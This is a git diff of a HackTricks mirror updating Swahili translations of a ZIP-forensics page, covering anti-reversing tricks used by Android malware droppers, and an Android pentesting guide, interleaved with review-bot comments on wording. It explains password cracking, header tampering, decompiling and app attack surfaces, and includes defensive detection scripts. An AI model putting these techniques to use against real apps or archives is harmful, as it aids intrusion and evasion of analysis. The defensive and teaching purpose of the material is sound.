mirror of https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00

Translated ['', 'src/pentesting-web/file-inclusion/lfi2rce-via-php-filte

This commit is contained in:
parent 19a08f127b
commit 64ad895e9c
@ -2,29 +2,29 @@

{{#include ../../../banners/hacktricks-training.md}}

**Command-line tools** za kusimamia **zip files** ni muhimu kwa uchunguzi, ukarabati, na kuvunja zip files. Hapa kuna utiliti kuu:
**Command-line tools** za kusimamia **zip files** ni muhimu kwa kutambua matatizo, kurekebisha, na kuvunja zip files. Hapa kuna zana kuu:

- **`unzip`**: Inaonyesha kwa nini faili ya zip inaweza kushindwa kutolewa.
- **`zipdetails -v`**: Inatoa uchambuzi wa kina wa mashamba ya muundo wa zip file.
- **`zipinfo`**: Inaorodhesha yaliyomo ya zip file bila kuyatoa.
- **`zip -F input.zip --out output.zip`** na **`zip -FF input.zip --out output.zip`**: Jaribu kurekebisha zip files zilizo haribika.
- **[fcrackzip](https://github.com/hyc/fcrackzip)**: Chombo cha brute-force kuvunja nywila za zip, kinachofaa kwa nywila hadi takriban herufi 7.
- **`unzip`**: Inaonyesha kwa nini zip file inaweza isiweze kutolewa.
- **`zipdetails -v`**: Inatoa uchanganuzi wa kina wa mashamba ya format ya zip file.
- **`zipinfo`**: Hutoa orodha ya yaliyomo kwenye zip file bila kuyatoa.
- **`zip -F input.zip --out output.zip`** na **`zip -FF input.zip --out output.zip`**: Jaribu kutengeneza tena zip files zilizoharibika.
- **[fcrackzip](https://github.com/hyc/fcrackzip)**: Zana ya brute-force kuvirusha password za zip, inayofanya kazi vizuri kwa password za takriban herufi 7 au chini.

The [Zip file format specification](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) inatoa maelezo kamili juu ya muundo na viwango vya zip files.
The [Zip file format specification](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) inatoa maelezo ya kina juu ya muundo na viwango vya zip files.

Ni muhimu kutambua kwamba zip files zilizolindwa kwa nywila hazifichi majina ya faili au ukubwa wa faili ndani yao, kosa la usalama ambalo halitokei kwenye RAR au 7z ambazo huficha taarifa hizi. Zaidi ya hayo, zip files zilizoencrypted kwa njia ya zamani ya ZipCrypto zina uwezekano wa kufahamika kwa plaintext attack ikiwa nakala isiyofichwa ya faili iliyofinyangwa inapatikana. Shambulio hili linatumia yaliyomo yanayojulikana kuvunja nywila ya zip, udhaifu uliobainishwa katika makala ya HackThis na umeelezewa zaidi katika karatasi hii ya kitaaluma. Hata hivyo, zip files zilizo secured kwa AES-256 zina kinga dhidi ya plaintext attack, ikionyesha umuhimu wa kuchagua mbinu salama za encryption kwa data nyeti.
Ni muhimu kutambua kwamba zip files zilizo na password zinalindwa kwa njia ya password **hazifichi majina ya faili au ukubwa wa faili** ndani yao, kasoro ya usalama ambayo haishirikiani na RAR au 7z ambazo huweka siri taarifa hizi. Zaidi ya hayo, zip files zilizoingia na njia ya zamani ya ZipCrypto zinaweza kushambuliwa kwa kutumia plaintext attack ikiwa kuna nakala isiyofichwa ya faili iliyoshinikwa. Shambulio hili linatumia yaliyomo yanayojulikana kuvunja password ya zip, udhaifu ulioelezewa kwenye [HackThis's article](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) na kufafanuliwa zaidi katika [this academic paper](https://www.cs.auckland.ac.nz/~mike/zipattacks.pdf). Hata hivyo, zip files zilizolindwa kwa **AES-256** ni salama dhidi ya plaintext attack hii, ikionyesha umuhimu wa kuchagua mbinu salama za encryption kwa data nyeti.

---

## Anti-reversing tricks in APKs using manipulated ZIP headers
## Mbinu za anti-reversing katika APKs kwa kutumia vichwa vya ZIP vilivyobadilishwa

Modern Android malware droppers hutumia metadata ya ZIP iliyofomatiwa vibaya kuvunja zana za static (jadx/apktool/unzip) huku wakihakikisha APK inaweza kusakinishwa kwenye kifaa. Mbinu zinazotumika mara kwa mara ni:
Malware droppers ya kisasa ya Android hutumia metadata ya ZIP iliyofanywa vibaya kuvunja zana za static (jadx/apktool/unzip) huku wakiruhusu APK kusakinishwa kifaa. Mbinu zinazotumika mara kwa mara ni:

- Ulaghai wa encryption kwa kuweka ZIP General Purpose Bit Flag (GPBF) bit 0
- Kutumia Extra fields kubwa/za custom kuvuruga parsers
- Migongano ya majina ya faili/directory kuficha artefact halisi (mfano, directory liitwalo `classes.dex/` kando ya `classes.dex` halisi)
- Fake encryption kwa kuweka ZIP General Purpose Bit Flag (GPBF) bit 0
- Kutumia Extra fields kubwa/maalum kuchanganya parsers
- Mgongano wa majina ya faili/dirctory kuficha artifacts halisi (mfano, directory yenye jina `classes.dex/` kando ya `classes.dex` halisi)

### 1) Fake encryption (GPBF bit 0 set) without real crypto
### 1) Fake encryption (GPBF bit 0 set) bila kripto halisi

Dalili:
- `jadx-gui` inashindwa na makosa kama:
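Review bot: two wording defects in the new translation of this hunk. In the fcrackzip bullet, `Zana ya brute-force kuvirusha password za zip` uses a verb that does not mean "crack"; the previous `kuvunja password za zip` is the right one. In the collision bullet, `Mgongano wa majina ya faili/dirctory` misspells `directory`. Two smaller points: `zip files zilizo na password zinalindwa kwa njia ya password` says "password-protected" twice, and `zilizolindwa kwa password` is enough; and `huku wakiruhusu APK kusakinishwa kifaa` drops the preposition that the previous `kusakinishwa kwenye kifaa` had.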
@ -32,7 +32,7 @@ Dalili:
```
java.util.zip.ZipException: invalid CEN header (encrypted entry)
```
- `unzip` inauliza nywila kwa faili kuu za APK ingawa APK halali haiwezi kuwa na `classes*.dex`, `resources.arsc`, au `AndroidManifest.xml` zilizofichwa:
- `unzip` inauliza password kwa faili kuu za APK ingawa APK halali haiwezi kuwa na `classes*.dex`, `resources.arsc`, au `AndroidManifest.xml` zilizofichwa kwa siri:

```bash
unzip sample.apk
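Review bot: `zilizofichwa kwa siri` in the `unzip` bullet reads as "hidden secretly", not "encrypted"; since this file keeps `encrypted` untranslated elsewhere (`zinaonekana "encrypted" kwa zana` a few hunks below), `zilizo encrypted` would be both consistent and unambiguous. The other change in the hunk, `nywila` to `password`, matches the term used throughout the new translation.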
@ -43,11 +43,11 @@ skipping: resources.arsc/res/domeo/eqmvo.xml            incorrect password
skipping: classes2.dex                          incorrect password
```

Uchunguzi kwa kutumia zipdetails:
Uchunguzi kwa zipdetails:
```bash
zipdetails -v sample.apk | less
```
Angalia General Purpose Bit Flag kwa vichwa vya local na central. Thamani inayofichua ni bit 0 imewekwa (Encryption) hata kwa core entries:
Tazama General Purpose Bit Flag kwa local na central headers. Thamani inayoonyesha ni bit 0 imewekwa (Encryption) hata kwa core entries:
```
Extract Zip Spec      2D '4.5'
General Purpose Flag  0A09
@ -56,9 +56,9 @@ General Purpose Flag  0A09
[Bit 3]   1 'Streamed'
[Bit 11]  1 'Language Encoding'
```
Heuristiki: Ikiwa APK inasakinishwa na inaendesha kwenye kifaa lakini core entries zinaonekana "encrypted" kwa zana, GPBF ilibadilishwa.
Heuristiki: Ikiwa APK inasakinishwa na inakimbia kwenye kifaa lakini ingizo za msingi zinaonekana "encrypted" kwa zana, GPBF iliharibishwa.

Rekebisha kwa kuweka bit 0 ya GPBF kuwa 0 kwenye entries zote za Local File Headers (LFH) na Central Directory (CD). Minimal byte-patcher:
Tengeneza kwa kufuta bit 0 ya GPBF katika Local File Headers (LFH) na Central Directory (CD) entries. Minimal byte-patcher:
```python
# gpbf_clear.py – clear encryption bit (bit 0) in ZIP local+central headers
import struct, sys
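Review bot: the new heuristic sentence changes the meaning in two places. `GPBF iliharibishwa` says the flag "was damaged", but the point of the heuristic is that it was deliberately set, so the previous `ilibadilishwa` (or `ilichezewa`, tampered) is correct. `ingizo za msingi` translates "core entries" while the neighbouring lines (`hata kwa core entries`, `kwenye core entries`) keep the English term; use one form. In the fix sentence, `Tengeneza kwa kufuta bit 0` means "build/make", whereas the previous `Rekebisha kwa kuweka bit 0 ... kuwa 0` says "fix"; `Rekebisha kwa kufuta bit 0 ya GPBF` keeps the right verb together with the clearer "clear" wording.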
@ -94,31 +94,33 @@ Matumizi:
python3 gpbf_clear.py obfuscated.apk normalized.apk
zipdetails -v normalized.apk | grep -A2 "General Purpose Flag"
```
Sasa unapaswa kuona `General Purpose Flag  0000` kwenye core entries na tools zitachakata APK tena.
Sasa unapaswa kuona `General Purpose Flag  0000` kwenye core entries na zana zitasoma APK tena.

### 2) Large/custom Extra fields to break parsers
### 2) Large/custom Extra fields za kuvunja parsers

Wavamizi huingiza Extra fields zilizo kubwa mno na IDs zisizo za kawaida ndani ya headers ili kuwapotosha decompilers. Katika mazingira halisi unaweza kuona alama za custom (kwa mfano, strings kama `JADXBLOCK`) zikiwa zimeingizwa pale.
Wavamizi huingiza Extra fields zilizo kubwa sana na IDs zisizo za kawaida kwenye headers ili kuwapotosha decompilers. Katika mazingira halisi unaweza kuona custom markers (kwa mfano, strings kama `JADXBLOCK`) zimeingizwa hapo.

Uchunguzi:
```bash
zipdetails -v sample.apk | sed -n '/Extra ID/,+4p' | head -n 50
```
Mifano iliyobainika: vitambulisho visivyojulikana kama `0xCAFE` ("Java Executable") au `0x414A` ("JA:") vinabeba mizigo mikubwa.
Mifano yaliyobainika: vitambulisho visivyojulikana kama `0xCAFE` ("Java Executable") au `0x414A` ("JA:") vinabeba payload kubwa.

DFIR heuristics:
- Onyo wakati Extra fields ni kubwa kupita kiasi kwenye core entries (`classes*.dex`, `AndroidManifest.xml`, `resources.arsc`).
- Chukulia Extra IDs zisizojulikana kwenye entries hizi kama zenye shaka.
Miongozo ya DFIR:
- Toa tahadhari wakati Extra fields zinapokuwa zisizo za kawaida kwa ukubwa kwenye core entries (`classes*.dex`, `AndroidManifest.xml`, `resources.arsc`).
- Chukulia Extra IDs zisizojulikana kwenye entries hizo kama zenye shaka.

Kukabiliana kwa vitendo: kujenga tena archive (mf. re-zipping faili zilizotolewa) huondoa Extra fields zenye uharibifu. Ikiwa zana zinakataa kutoa kwa sababu ya fake encryption, kwanza clear GPBF bit 0 kama hapo juu, kisha repackage:
Uzuiaji wa vitendo: kujenga upya archive (mfano, re-zipping extracted files) huondoa Extra fields zenye uovu. Ikiwa zana zinakataa kutoa kwa sababu ya fake encryption, kwanza futa GPBF bit 0 kama ilivyoelezwa hapo juu, kisha repack:
```bash
mkdir /tmp/apk
unzip -qq normalized.apk -d /tmp/apk
(cd /tmp/apk && zip -qr ../clean.apk .)
```
### 3) Mgongano wa majina ya Faili/Saraka (kuficha hati halisi)
### 3) Mgongano ya majina ya faili/saraka (kuficha artifacts halisi)

A ZIP inaweza kuwa na faili `X` na pia saraka `X/`. Baadhi ya extractors na decompilers huchanganyikiwa na zinaweza kuifunika au kuficha faili halisi kwa kiingizo cha saraka. Hii imeonekana kwa vile kiingizo kinapogongana na majina ya msingi ya APK kama `classes.dex`.
ZIP inaweza kuwa na faili `X` na saraka `X/`. Baadhi ya extractors na decompilers huchanganyikiwa na zinaweza ku-overlay au kuficha faili halisi kwa kuingia kwa saraka. Hii imeonekana ikitokea kwa maingizo yanapogongana na majina ya msingi ya APK kama `classes.dex`.

Uainishaji na uchimbaji salama:
Triage na uchimbaji salama:
```bash
# List potential collisions (names that differ only by trailing slash)
zipinfo -1 sample.apk | awk '{n=$0; sub(/\/$/,"",n); print n}' | sort | uniq -d
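Review bot: the collision paragraph in the new text misreads "directory entry": `kuficha faili halisi kwa kuingia kwa saraka` says "by entering the directory", whereas the previous `kwa kiingizo cha saraka` (with a directory entry) is what the technique is about; keep `kiingizo cha saraka`. Grammar in the same hunk: `Mifano yaliyobainika` should agree as `Mifano iliyobainika` (the previous line had it right), and the heading `### 3) Mgongano ya majina ya faili/saraka` should read `Mgongano wa majina`. Terminology: `Extra fields zenye uovu` ("evil") is odd for malformed fields; `hasidi`, which the commit itself uses for "malicious" in the Android README hunks, fits better.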
@ -129,7 +131,7 @@ unzip normalized.apk -d outdir
# replace outdir/classes.dex? [y]es/[n]o/[A]ll/[N]one/[r]ename: r
# new name: unk_classes.dex
```
Kiambishi cha mwisho kwa ugunduzi wa kimaprogremu:
Kiambishi cha baada (post-fix) cha utambuzi wa kimaprogramu:
```python
from zipfile import ZipFile
from collections import defaultdict
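Review bot: `Kiambishi cha baada (post-fix)` renders "post-fix" as a grammatical affix (`kiambishi` is a prefix/suffix), which is not the sense here; in context the line introduces a programmatic check to run after the header fix, so something like `Baada ya kurekebisha: utambuzi wa kimaprogramu` conveys it. The previous `Kiambishi cha mwisho kwa ugunduzi wa kimaprogremu` had the same problem plus a misspelling, so the new line improves the spelling but still gets the key word wrong.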
@ -146,14 +148,14 @@ for base, variants in collisions.items():
if len(variants) > 1:
print('COLLISION', base, '->', variants)
```
Mapendekezo za utambuzi kwa Blue-team:
- Bainisha APKs zilizo na vichwa vya ndani vinavyoonyesha encryption (GPBF bit 0 = 1) lakini bado zinasakinishwa/kukimbia.
- Bainisha Extra fields kubwa/zisizojulikana kwenye core entries (tafuta alama kama `JADXBLOCK`).
- Bainisha path-collisions (`X` and `X/`) hasa kwa `AndroidManifest.xml`, `resources.arsc`, `classes*.dex`.
Mapendekezo ya utambuzi kwa timu ya Blue:
- Alama APK ambazo vichwa vya ndani vinaonyesha encryption (GPBF bit 0 = 1) lakini zinasakinishwa/zinakimbia.
- Alama mawanja ya ziada makubwa/ yasiyojulikana kwenye ingizo za msingi (tazama alama kama `JADXBLOCK`).
- Alama mgongano wa njia (`X` na `X/`) hasa kwa `AndroidManifest.xml`, `resources.arsc`, `classes*.dex`.

---

## Marejeleo
## Marejeo

- [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
- [GodFather – Part 1 – A multistage dropper (APK ZIP anti-reversing)](https://shindan.io/blog/godfather-part-1-a-multistage-dropper)

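Review bot: the blue-team bullets in the new text start with `Alama APK ...`, `Alama mawanja ...`, `Alama mgongano ...`; `alama` is the noun "mark", so each imperative needs a verb (`Weka alama kwenye ...`, or `Bainisha` as in the previous version). The second bullet also translates the two terms the rest of the file keeps in English, `mawanja ya ziada` for "Extra fields" and `ingizo za msingi` for "core entries", and has a stray space in `makubwa/ yasiyojulikana`. `timu ya Blue` is fine on its own, but the previous line kept `Blue-team`; pick one and use it consistently.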
										
											
File diff suppressed because it is too large
@ -1,10 +1,10 @@
# Programu za Android Pentesting
# Android Applications Pentesting

{{#include ../../banners/hacktricks-training.md}}

## Misingi ya Programu za Android
## Android Applications Basics

Inashauriwa sana kuanza kusoma ukurasa huu ili kujue kuhusu **sehemu muhimu zaidi zinazohusiana na usalama wa Android na vipengele hatari zaidi katika programu ya Android**:
Inashauriwa sana kuanza kusoma ukurasa huu ili kujua kuhusu **sehemu muhimu zaidi zinazohusiana na usalama wa Android na vipengele hatari zaidi katika programu ya Android**:


{{#ref}}
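Review bot: this hunk reverts the two Swahili headings (`# Programu za Android Pentesting`, `## Misingi ya Programu za Android`) to their English originals (`# Android Applications Pentesting`, `## Android Applications Basics`). If that is intentional, for example to keep heading anchors stable across translations, the commit message should say so; otherwise it is a regression for a translation commit. The body change `kujue` to `kujua` is a correct typo fix.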
@ -13,24 +13,24 @@ android-applications-basics.md

## ADB (Android Debug Bridge)

Hii ni zana kuu unayohitaji kuunganisha na kifaa cha Android (kilichoiga au cha kimwili).\
**ADB** inaruhusu kudhibiti vifaa kupitia **USB** au **mtandao** kutoka kwa kompyuta. Huduma hii inafanya iwezekane **kunakili** faili kwa pande zote mbili, **kusakinisha** na **kuondoa** apps, **kutekeleza** amri za shell, **kutengeneza nakala (backup)** za data, **kusoma** logi, pamoja na kazi nyingine.
Hii ni zana kuu unayohitaji kuunganishwa na kifaa cha Android (emulated au halisi).\
**ADB** inaruhusu kudhibiti vifaa kwa njia ya **USB** au **Network** kutoka kwenye kompyuta. Kifaa hiki kinawezesha **kunakili** mafaili pande zote mbili, **kusakinisha** na **kuondoa** apps, **kutekeleza** amri za shell, **kufanya backup** ya data, **kusoma** logi, pamoja na kazi nyingine.

Tazama orodha ifuatayo ya [**ADB Commands**](adb-commands.md) ili kujifunza jinsi ya kutumia adb.
Angalia orodha ifuatayo ya [**ADB Commands**](adb-commands.md) ili kujifunza jinsi ya kutumia adb.

## Smali

Wakati mwingine ni vyema **kubadilisha msimbo wa programu** ili kupata **taarifa zilizofichwa** (labda nywila zilizofichwa vizuri au flagi). Kisha, inaweza kuwa muhimu ku-decompile apk, kubadilisha msimbo na ku-recompile tena.\
[**In this tutorial** you can **learn how to decompile and APK, modify Smali code and recompile the APK** with the new functionality](smali-changes.md). Hii inaweza kuwa muhimu kama **mbadala kwa vipimo kadhaa wakati wa uchambuzi wa dynamic** utakaowasilishwa. Basi, **kumbuka kila wakati uwezekano huu**.
Wakati mwingine ni muhimu **kubadilisha msimbo wa programu** ili kupata **taarifa zilizofichwa** (labda nywila zilizofichwa vizuri au flagi). Kwa hivyo, inaweza kuwa muhimu ku-decompile APK, kubadilisha msimbo na kuirecompile.\
[**In this tutorial** you can **learn how to decompile and APK, modify Smali code and recompile the APK** with the new functionality](smali-changes.md). Hii inaweza kuwa msaada mkubwa kama **mbadala kwa vipimo kadhaa wakati wa dynamic analysis** vitakavyoonyeshwa. Kwa hivyo, **kumbuka daima uwezekano huu**.

## Mbinu nyingine za kuvutia
## Other interesting tricks

- [Spoofing your location in Play Store](spoofing-your-location-in-play-store.md)
- [Shizuku Privileged API (ADB-based non-root privileged access)](shizuku-privileged-api.md)
- [Exploiting Insecure In-App Update Mechanisms](insecure-in-app-update-rce.md)
- [Abusing Accessibility Services (Android RAT)](accessibility-services-abuse.md)
- **Download APKs**: [https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/), [https://github.com/kiber-io/apkd](https://github.com/kiber-io/apkd)
- Toa APK kutoka kifaa:
- Extract APK from device:
```bash
adb shell pm list packages
com.android.insecurebankv2
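Review bot: `Kifaa hiki kinawezesha ...` in the ADB paragraph calls ADB a device (`kifaa`); the previous `Huduma hii` (or `Zana hii`, this tool) is right, since the sentence goes on to describe what the tool can do. The English link text kept in both versions, `learn how to decompile and APK`, should read `an APK`. As in the first README hunk, `## Other interesting tricks` and `Extract APK from device:` revert Swahili lines to English; confirm that is intended rather than a lost translation.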
@ -49,7 +49,7 @@ java -jar ../APKEditor.jar m -i splits/ -o merged.apk
# after merging, you will need to align and sign the apk, personally, I like to use the uberapksigner
java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed
```
## Mifano ya Kesi na Udhaifu
## Case Studies & Vulnerabilities


{{#ref}}
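Review bot: `## Case Studies & Vulnerabilities` replaces the Swahili `## Mifano ya Kesi na Udhaifu`; same question as for the other reverted headings in this commit, whether English headings are now the intended convention for this page. Nothing else changes in this hunk.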
@ -61,41 +61,41 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed
../../linux-hardening/privilege-escalation/android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
{{#endref}}

## Uchambuzi wa Statiki
## Static Analysis

Kwanza kabisa, kwa kuchambua APK unapaswa **kutazama msimbo wa Java** kwa kutumia decompiler.\
Please, [**read here to find information about different available decompilers**](apk-decompilers.md).
Kwanza kabisa, kwa kuchambua APK unapaswa **kuangalia msimbo wa Java** kwa kutumia decompiler.\
Tafadhali, [**soma hapa kupata taarifa kuhusu decompilers tofauti zinazopatikana**](apk-decompilers.md).

### Kutafuta Taarifa Zinazovutia
### Looking for interesting Info

Kwa kuangalia tu **strings** za APK unaweza kutafuta **passwords**, **URLs** ([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep)), **api** keys, **encryption**, **bluetooth uuids**, **tokens** na chochote kinachovutia... angalia hata kwa code execution **backdoors** au authentication backdoors (hardcoded admin credentials kwa app).
Kwa kuangalia tu **strings** za APK unaweza kutafuta **passwords**, **URLs** ([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep)), **api** keys, **encryption**, **bluetooth uuids**, **tokens** na chochote kinachovutia... angalia hata kwa code execution **backdoors** au authentication backdoors (hardcoded admin credentials kwenye app).

**Firebase**

Lipa kipaumbele maalum kwa **firebase URLs** na angalia ikiwa imekonfiguriwa vibaya. [More information about whats is FIrebase and how to exploit it here.](../../network-services-pentesting/pentesting-web/buckets/firebase-database.md)
Lipa umakini maalum kwa **firebase URLs** na angalia kama imewekwa vibaya. [Taarifa zaidi kuhusu ni nini Firebase na jinsi ya kuitumia hapa.](../../network-services-pentesting/pentesting-web/buckets/firebase-database.md)

### Uelewa wa Msingi wa programu - Manifest.xml, strings.xml
### Basic understanding of the application - Manifest.xml, strings.xml

Ukaguzi wa faili za programu _Manifest.xml_ na _strings.xml_ unaweza kubaini udhaifu wa usalama. Faili hizi zinaweza kupatikana kwa kutumia decompilers au kwa kubadilisha extension ya faili ya APK kuwa .zip kisha kuizipisha.
Uchunguzi wa faili za programu za _Manifest.xml_ na **_strings.xml_** unaweza kufichua udhaifu wa usalama. Faili hizi zinaweza kufikiwa kwa kutumia decompilers au kwa kubadilisha extension ya faili ya APK kuwa .zip kisha kuizikamua.

Udhaifu unaobainika kutoka Manifest.xml ni pamoja na:
**Vulnerabilities** zilizotambulika kutoka kwa **Manifest.xml** ni pamoja na:

- **Maombi yanayoweza ku-debug (Debuggable Applications)**: Maombi yaliyowekwa kama `debuggable="true"` katika _Manifest.xml_ yanaweza kuwapo kwa hatari kwa sababu yanaruhusu muunganisho ambao unaweza kusababisha exploitation. Kwa uelewa zaidi kuhusu jinsi ya ku-exploit applications zilizo set kama debuggable, angalia tutorial za kutafuta na ku-exploit applications debuggable kwenye kifaa.
- **Mipangilio ya Backup**: Attribute `android:allowBackup="false"` inapaswa kuwekwa wazi kwa applications zinazoendesha habari nyeti ili kuzuia backups zisizoidhinishwa za data kupitia adb, hasa wakati usb debugging imewezeshwa.
- **Network Security**: Custom network security configurations (`android:networkSecurityConfig="@xml/network_security_config"`) katika _res/xml/_ zinaweza kubainisha maelezo ya usalama kama certificate pins na mipangilio ya HTTP traffic. Mfano ni kuruhusu HTTP traffic kwa domain maalum.
- **Exported Activities and Services**: Kutambua exported activities na services katika manifest kunaweza kuonyesha components ambazo zinaweza kutumika vibaya. Uchambuzi zaidi wakati wa dynamic testing unaweza kubaini jinsi ya ku-exploit components hizi.
- **Content Providers and FileProviders**: Content providers zilizo wazi zinaweza kuruhusu upatikanaji usioidhinishwa au marekebisho ya data. Muundo wa FileProviders pia unapaswa kuchunguzwa.
- **Broadcast Receivers and URL Schemes**: Components hizi zinaweza kutumika kwa exploitation, hasa kwa kuzingatia jinsi URL schemes zinavyosimamiwa kwa ajili ya udhaifu wa input.
- **SDK Versions**: `minSdkVersion`, `targetSDKVersion`, na `maxSdkVersion` zinaonyesha matoleo ya Android yanayotumika, zikibainisha umuhimu wa kutojisikia kwa matoleo ya Android yasiyokuwa salama kwa sababu za usalama.
- **Debuggable Applications**: Programu zilizowekwa kama debuggable (`debuggable="true"`) katika _Manifest.xml_ zina hatari kwa sababu zinaruhusu muunganisho ambao unaweza kusababisha exploitation. Kwa uelewa zaidi juu ya jinsi ya kutumia programu debuggable, rejea mafunzo juu ya kutafuta na kushambulia debuggable applications kwenye kifaa.
- **Backup Settings**: Sifa `android:allowBackup="false"` inapaswa kuwekwa wazi kwa programu zinazoshughulikia taarifa nyeti ili kuzuia backups zisizoidhinishwa kupitia adb, hasa wakati usb debugging imewezeshwa.
- **Network Security**: Custom network security configurations (`android:networkSecurityConfig="@xml/network_security_config"`) katika _res/xml/_ zinaweza kueleza undani wa usalama kama certificate pins na mipangilio ya HTTP traffic. Mfano ni kuruhusu HTTP traffic kwa domains maalum.
- **Exported Activities and Services**: Kutambua exported activities na services katika manifest kunaweza kuonyesha vipengele vinavyoweza kutumiwa vibaya. Uchambuzi zaidi wakati wa dynamic testing unaweza kufichua jinsi ya kushambulia vipengele hivi.
- **Content Providers and FileProviders**: Content providers zilizo wazi zinaweza kuruhusu ufikiaji usioidhinishwa au urekebishaji wa data. Usanidi wa FileProviders pia unapaswa kuchunguzwa kwa makini.
- **Broadcast Receivers and URL Schemes**: Vipengele hivi vinaweza kutumiwa kwa exploitation, na umakini maalum unapaswa kuwekwa jinsi URL schemes zinavyosimamiwa kwa ajili ya input vulnerabilities.
- **SDK Versions**: `minSdkVersion`, `targetSDKVersion`, na `maxSdkVersion` zinaonyesha matoleo ya Android yanayounga mkono, yakionyesha umuhimu wa kutoendelea kuunga mkono matoleo ya zamani na yenye udhaifu kwa sababu za usalama.

Kutoka kwa faili ya **strings.xml**, habari nyeti kama API keys, custom schemas, na maelezo mengine ya developer zinaweza kugunduliwa, ikisisitiza haja ya kupitia rasilimali hizi kwa uangalifu.
Kutoka kwa faili ya **strings.xml**, taarifa nyeti kama API keys, custom schemas, na maelezo mengine ya developer zinaweza kugunduliwa, ikisisitiza umuhimu wa ukaguzi wa makini wa rasilimali hizi.

### Tapjacking

Tapjacking ni attack ambapo malicious application inazinduliwa na kujipanga juu ya victim application. Mara inapofunika kwa muonekano victim app, user interface yake imeundwa kwa njia ya kumdanganya mtumiaji kuingiliana nayo, wakati inapipitisha interaction hiyo kwa victim app.\
Kwa vitendo, inamficha mtumiaji kutoka kujua kwamba kwa kweli anatekeleza vitendo kwenye victim app.
**Tapjacking** ni shambulio ambapo **malicious** **application** inazinduliwa na **kujipangia juu ya application ya mwathiriwa**. Mara inapoificha app ya mwathiriwa, kiolesura chake kimeundwa kwa njia inayodanganya mtumiaji kuingiliana nayo, wakati kiingiliano hicho kinapitishwa kwa app ya mwathiriwa.\
Kwa ufanisi, inamficha mtumiaji ili asijue kuwa kwa kweli anafanya vitendo kwenye app ya mwathiriwa.

Find more information in:
Pata habari zaidi katika:


{{#ref}}
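Review bot: in the Manifest/strings paragraph, `kuizikamua` (to squeeze or press) is not "unzip"; `kuifungua` or `kuitoa` describes extracting the renamed .zip. In the SDK bullet, `matoleo ya Android yanayounga mkono` is active ("versions that support"); the supported versions need the passive `yanayoungwa mkono`. The added bold in `**_strings.xml_**` is inconsistent with the plain `_Manifest.xml_` beside it. Translating the leftover English link sentences (`Tafadhali, soma hapa ...`, the Firebase link) is a correct improvement, though `jinsi ya kuitumia` ("how to use it") is weaker than the previous English `how to exploit it`.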
@ -104,9 +104,9 @@ tapjacking.md

### Task Hijacking

Activity yenye `launchMode` iliyowekwa kwa `singleTask` bila `taskAffinity` yoyote iliyotajwa ni nyeti kwa task Hijacking. Hii inamaanisha kwamba application inaweza kusanikishwa na ikiwa itazinduliwa kabla ya application halisi inaweza hijack task ya application halisi (hivyo mtumiaji atakuwa akishirikiana na malicious application akidhani anatumia ile halisi).
Activity yenye **`launchMode`** imewekwa kwa **`singleTask` bila `taskAffinity`** yoyote iliyobainishwa ni nyeti kwa task Hijacking. Hii ina maana kwamba, application inaweza kusakinishwa na ikiwa itaendeshwa kabla ya application halisi inaweza **hijack task ya application halisi** (hivyo mtumiaji atakuwa akishirikiana na **malicious application akidhani anatumia ile halisi**).

More info in:
Taarifa zaidi katika:


{{#ref}}
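Review bot: `Hii ina maana kwamba, application inaweza ...` has a stray comma after `kwamba`. Otherwise the hunk only adds emphasis and replaces the leftover English `More info in:` with `Taarifa zaidi katika:`, which is correct.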
@ -117,69 +117,69 @@ android-task-hijacking.md
 | 
			
		||||
 | 
			
		||||
**Internal Storage**
 | 
			
		||||
 | 
			
		||||
Katika Android, faili zilizohifadhiwa katika internal storage zimeundwa zilipwe kupatikana kikamilifu na app iliyozizalisha. Hatua hii ya usalama inatekelezwa na mfumo wa uendeshaji wa Android na kwa kawaida ni ya kutosha kwa mahitaji ya usalama ya applications nyingi. Hata hivyo, developers wakati mwingine hutumia mode kama `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` kuruhusu faili kushirikiwa kati ya applications tofauti. Mode hizi hazizuizi upatikanaji wa faili hizi na applications nyingine, pamoja na zile ambazo zinaweza kuwa malicious.
 | 
			
		||||
Katika Android, faili zilizohifadhiwa katika **internal** storage zimetengenezwa kuwa zinapatikana mahsusi kwa **app** iliyozianzisha. Hatua hii ya usalama inatekelezwa na mfumo wa uendeshaji wa Android na kwa kawaida inatosheleza mahitaji ya usalama ya programu nyingi. Hata hivyo, waendelezaji wakati mwingine hutumia modes kama `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` kuruhusu faili kushirikiwa kati ya applications mbalimbali. Modes hizi hata hivyo **hazizuizi ufikiaji** wa faili hizi na applications nyingine, ikiwa ni pamoja na zile zinazoweza kuwa zenye malice.
 | 
			
		||||
 | 
			
		||||
1. **Uchambuzi wa Statiki:**
 | 
			
		||||
- **Hakikisha** kwamba matumizi ya `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` yamechunguzwa kwa uangalifu. Mode hizi **zinaweza kuonyesha** faili kwa **upatikanaji usiotarajiwa au usioidhinishwa**.
 | 
			
		||||
2. **Uchambuzi wa Dinamiki:**
 | 
			
		||||
- **Thibitisha** **permissions** zilizowekwa kwenye faili zilizoundwa na app. Hasa, **kagua** kama kuna faili zilizowekwa kuwa **zinazosomwa au zinaandikwa na kila mtu**. Hii inaweza kuleta hatari kubwa ya usalama, kwani itamruhusu **application yoyote** iliyowekwa kwenye kifaa, bila kujali chanzo au nia yake, **kusoma au kubadilisha** faili hizi.
 | 
			
		||||
1. **Static Analysis:**
 | 
			
		||||
- **Hakikisha** matumizi ya `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` yanachunguzwa kwa makini. Modes hizi **zinaweza kuonyesha** faili kwa ufikiaji usiokusudiwa au usioidhinishwa.
 | 
			
		||||
2. **Dynamic Analysis:**
 | 
			
		||||
